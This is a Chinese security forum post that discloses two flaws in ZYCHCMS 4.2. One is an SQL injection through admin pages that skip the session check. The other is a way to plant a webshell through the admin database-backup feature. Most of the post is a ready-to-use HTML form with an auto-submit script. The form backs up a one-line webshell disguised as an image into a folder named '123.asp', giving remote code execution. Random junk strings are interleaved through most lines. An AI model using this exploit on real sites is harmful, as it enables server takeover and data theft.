找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1851|回复: 0
打印 上一主题 下一主题

ZYCHCMS企业网站管理系统SQL注入漏洞及后台拿webshell

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-10 21:09:51 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

# r1 }5 ^9 x& D5 P4 c2 Q. ^# a
* B5 i6 {# H: T! K. e4 y0 r' J! Y. y  V  }5 x# Y. I7 X3 r$ O
4 f$ K4 ^/ z$ ?  z3 u! l
影响版本:ZYCHCMS企业网站管理系统4.2(存在以下两个文件的版本应该是通杀)
2 _9 N6 e  L. B: d9 e8 \ ①SQL注射漏洞
* c4 @2 T: V& q; r2 t& l 漏洞文件:/admin/add_js.asp & /admin/add_xm_jiang.asp/ B/ Q3 ]* J0 V& K( e6 W  V) R' T/ u
漏洞原因:未过滤
2 ~6 C1 a$ q3 i9 B) k# i6 G/ n 漏洞代码:7 n3 n8 {/ V0 D9 \
都是相同的,文件开头没有调用过滤文件/admin/seeion.asp,导致没有对当前权限进行判断,就直接操作数据库。5 k8 ~& R. U: {/ a% J2 Z
修复方法:在文件开头加入代码. w7 N- k( @+ Q/ Z- T- l. k1 N

2 D, h7 K2 X# d: S# ]+ v) ]: o( @
9 E1 `6 C  E+ C& s" P. }) z②后台拿WBSHELL" C, s9 @; t. {, m8 v! k
进入后台有一个数据库备份,可以通过本地提交突破创建.asp后缀文件夹,并将一句话备份进去。: @+ c8 `2 N' j$ c$ `9 T6 r! _
这里在网上找了一个,改了下,将就着用。! `, H% ]# q4 Q* k$ q' ?- ?
以下是代码本地提交代码
# s  W9 b7 p, ]# ~; @) ?! ~, Y
( S! j+ _" T" d& T, D2 L! l, n
$ A7 w( u' @$ O+ ~* h<form method=”post” action=”http://localhost/admin/Manage_backup.asp?action=Backup” name=add>$ z9 u( W& Q1 p7 w0 K
<!–eg:http://127.0.0.1:99/admin/Manage_backup.asp?action=Backup–>4 [4 b' K' I& Z2 z3 v9 L
<tr>
; h. N, A" Q% X7 r, c/ D3 {7 u <td height=”30″ background=”images/bg_list.gif”><div style=”padding-left:10px; font-weight:bold; color:#FFFFFF; text-align:left”>备份数据库</div></td>
% p$ ~, q$ F6 |  M; V) ~1 @ </tr>
( @  ~7 I% c& n0 b! B+ X <tr>
$ z( d+ M" y' `1 ]$ i8 M* N <td bgcolor=”#FFFFFF”><span class=”back_southidc”>) i* y4 M  O" ?0 F5 R: S8 b, X  X) N
</span>5 B6 _9 X  f! j: e
<table width=”100%” border=”0″ align=”center” cellpadding=”5″ cellspacing=”0″ >0 t" P4 y8 x4 L
<tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″ >
4 \3 _# D. Y! K1 W% I+ d, `6 X <td height=”25″ width=”30%” class=”td”><div align=”left”>当前数据库路径</div></td>% G4 h0 ?2 ~$ x, ?: \1 Q* B
<td width=”70%” class=”td”>90sec. K5 L9 v8 S8 d$ `: e1 @# g2 y3 x% O1 V
<div align=”left”>& S- K& ]( H. x3 a
<input type=”text” size=”30″ name=”DBpath” value=”此处为你在其网站上传的图片格式一句话路径” />
$ _2 Y  R5 A5 O$ t" S <!–eg:../uploadfile/image/Logo/20120803130885328532_ZYCH.jpg>
3 K, @6 T! V* b$ x0 p <input type=”hidden” size=”50″ name=”bkfolder” value=”123.asp” />6 M3 H* b  W9 E$ N& J$ U$ y; V
</div></td>
# r$ K: s0 L5 J' T* y3 G </tr>/ p" ]' H! K( R
<tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#FFFFFF’” bgcolor=”#FFFFFF”>
7 S% X" Y/ W; L; j# o <td height=”25″ width=”30%” class=”td”><div align=”left”>备份数据库名称</div></td>7 h. h0 o& Z% C+ F
<td class=”td”><div align=”left”>
( Z- {7 F( @+ n" G& P4 p <input type=”text” size=”30″ name=”bkDBname” value=”4.mdb” />
# g7 ]+ X. b; I. _+ Z [如备份目录有该文件,将覆盖,如沒有,将自动创建]</div></td>" j# E) Y! m' q
</tr>2 E7 d: Y' t+ O# p: T5 c
<tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″>- D1 S  R) t# k9 p/ `. q/ b1 z
<td height=”25″ width=”30%” class=”td”><div align=”left”></div></td>* P6 t7 B! V$ W% \; B+ I
<td class=”td”><div align=”left”>( [) O. A! s& j; ^% ~
<input type=”submit” value=”确定备份” class=”btn”
& A+ c. w' n2 I6 v" k0 s </div></td>2 m7 l- J& Z2 m  r- H  ~
</tr>
- S3 Z+ y- p6 @ </table></td></tr></form>: w$ O. U% V5 j1 \0 D
</table>
7 n* O* }1 U6 `  { </td>& y, A9 x+ e8 [. c: m
</tr>
0 S. U1 p. M8 _' d4 [4 Y4 u% s4 | </table>
+ x5 T. b$ }  [4 N+ o5 ?& l <script>2 ~9 }0 {: N6 _2 p# g! u+ R8 \/ C6 [5 Z
document.all.add.submit();
( l/ \" M" y6 n. \1 F </script>
! X, m; Q9 r3 q: H2 r
/ x) y. n$ Y9 ^/ ?; Z; y3 r; v: q; ?9 {$ m' U5 s3 ?
' ^" h, G, R; c

8 V9 }' y3 E6 o+ L2 Q5 e
) g; K( |% F  D4 U/ K& d% D4 _$ u% b6 W7 @# B, j9 n
; [' ]$ k# l% x/ m

) g/ R& ?- p7 q
( j! ~" [! j* O" S7 F9 G8 G3 F. h; {) q0 R$ u1 o9 @) y
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表